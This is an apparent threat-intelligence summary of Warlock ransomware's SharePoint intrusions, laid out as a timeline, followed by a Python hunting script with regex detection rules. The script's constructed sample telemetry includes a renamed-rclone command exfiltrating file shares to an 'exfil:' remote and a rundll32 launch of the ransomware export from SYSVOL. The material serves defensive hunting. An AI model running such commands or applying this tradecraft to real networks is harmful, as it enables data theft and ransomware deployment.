Warlock Ransomware Expands SharePoint Intrusions With Stealthier Post-Exploitation
Warlock ransomware operators have continued exploiting unpatched Microsoft SharePoint servers, but recent intrusions show a more mature post-exploitation playbook focused on persistence, lateral movement, and evasion after initial access. Trend Micro reported the group is now using a bring your own vulnerable driver (BYOVD) technique involving the Nsec driver, alongside tools such as TightVNC and the Yuze reverse proxy, to move more quietly across victim networks and reduce the chance of detection. The activity has affected organizations in the technology, manufacturing, and government sectors, with observed victims in the U.S., Germany, and Russia.
Incident details show the operators escalating to full domain compromise by abusing credentials, resetting the built-in Administrator account, and adding users to the Domain Administrators group. They used PsExec, PowerShell Remoting, MSI-based deployment of TightVNC, and RDP-enabling utilities to maintain remote access and spread laterally, while web shells, tunneling, and other remote-control mechanisms supported persistence and command-and-control. The reporting indicates Warlock has kept its SharePoint exploitation path consistent, but has significantly strengthened the actions that follow compromise, giving defenders a clearer set of behaviors to hunt for beyond the initial server exploit.

How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Trend Micro publishes analysis of Warlock’s enhanced tradecraft
Trend Micro disclosed details of the January 2026 intrusion, describing Warlock’s improved post-exploitation methods, expanded toolset, and use of stealthy tunneling and BYOVD techniques.
Ransomware execution drops lockdatareadme.txt note
The attack’s impact phase culminated in ransomware execution across the environment, after which a ransom note named lockdatareadme.txt was dropped on affected systems.
Warlock stages ransomware via SYSVOL, NETLOGON, and Group Policy
The operators placed ransomware components in SYSVOL and NETLOGON shares and configured Active Directory Group Policy startup scripts to execute the RunCryptor export from run.dll across the enterprise.
Data is exfiltrated to an attacker-controlled S3 bucket
Before ransomware deployment, the intruders used a renamed rclone binary, TrendFileSecurityCheck.exe, to steal data from the victim network and transfer it to an attacker-controlled Amazon S3 bucket.
Warlock uses BYOVD to disable security tools
The attackers abused the vulnerable NSecKrnl.sys driver in a bring-your-own-vulnerable-driver technique, using a renamed loader called TrendSecurity.exe to impair security products across the environment.
Attackers expand persistence, lateral movement, and covert access
During the intrusion, the operators used PsExec, PowerShell Remoting, TightVNC, Velociraptor, VS Code CLI tunneling, Cloudflare Tunnel, Yuze, and RDP patching to move laterally and maintain multiple redundant access and command-and-control channels.
Warlock compromises a victim network in a January 2026 intrusion
In January 2026, Warlock gained access to a victim environment and remained inside for about 15 days. The intrusion ultimately resulted in full domain-level control and preparation for enterprise-wide ransomware deployment.
Warlock continues exploiting unpatched SharePoint servers for initial access
Warlock, also tracked as Water Manaul, continued using known Internet-facing Microsoft SharePoint vulnerabilities for intrusion, including CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, and CVE-2025-53771. Researchers linked the group’s initial access activity to SharePoint worker processes.
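The timeline above names several concrete post-exploitation artifacts (a Group Policy startup script invoking the RunCryptor export of run.dll from SYSVOL or NETLOGON, rclone renamed to TrendFileSecurityCheck.exe, the NSecKrnl.sys driver loaded by a loader renamed TrendSecurity.exe). The hunting logic below is an added example, not detection content from Trend Micro or Mallory; the event record shape, the regex patterns, the domain name, the rclone remote name and the sample telemetry are all constructed assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    """Minimal endpoint telemetry record (constructed shape, not a real product schema)."""
    kind: str          # "process" (process creation) or "driver" (driver load)
    image: str         # full path of the executable or driver
    cmdline: str = ""  # command line, process events only

# Each rule: (name, event kind it applies to, pattern over "image cmdline").
# The indicators come from the timeline above; the regex shapes are assumptions.
RULES = [
    # GPO startup script launching the ransomware export from a domain share
    ("gpo_startup_rundll_runcryptor", "process",
     re.compile(r"rundll32(\.exe)?\b.*\\(sysvol|netlogon)\\.*run\.dll\s*,\s*RunCryptor", re.I)),
    # rclone renamed to TrendFileSecurityCheck.exe, invoked with an rclone transfer verb
    ("renamed_rclone_transfer", "process",
     re.compile(r"TrendFileSecurityCheck\.exe\b.*\b(copy|sync|move)\b", re.I)),
    # BYOVD: the vulnerable NSecKrnl.sys driver being loaded
    ("byovd_nseckrnl_load", "driver", re.compile(r"\\NSecKrnl\.sys$", re.I)),
    # renamed loader used alongside the driver
    ("byovd_loader_trendsecurity", "process", re.compile(r"\\TrendSecurity\.exe\b", re.I)),
]

def match_event(ev: Event) -> list:
    """Return the names of every rule the event triggers (empty list if none)."""
    haystack = ev.image if ev.kind == "driver" else f"{ev.image} {ev.cmdline}"
    return [name for name, kind, rx in RULES if kind == ev.kind and rx.search(haystack)]

def hunt(events) -> list:
    """Return (image, [rule names]) for every event that triggers at least one rule."""
    return [(ev.image, hits) for ev in events if (hits := match_event(ev))]

# Constructed sample telemetry: four records modelled on the timeline, one benign rundll32 use.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe \\corp.example\SYSVOL\corp.example\scripts\run.dll,RunCryptor"),
    Event("process", r"C:\ProgramData\TrendFileSecurityCheck.exe",
          r"TrendFileSecurityCheck.exe copy D:\Shares exfil:bucket-name --transfers 16"),
    Event("driver", r"C:\Windows\Temp\NSecKrnl.sys"),
    Event("process", r"C:\Users\Public\TrendSecurity.exe", "TrendSecurity.exe"),
    Event("process", r"C:\Windows\System32\rundll32.exe",
          "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for image, hits in hunt(SAMPLE_EVENTS):
        print(image, "->", ", ".join(hits))
```

Filename-based rules are brittle once an operator renames tooling again, so the rundll32 rule keys on the share path plus the export name rather than on the binary alone; the driver rule is the most durable of the four because the vulnerable driver's hash and name are what the BYOVD technique depends on.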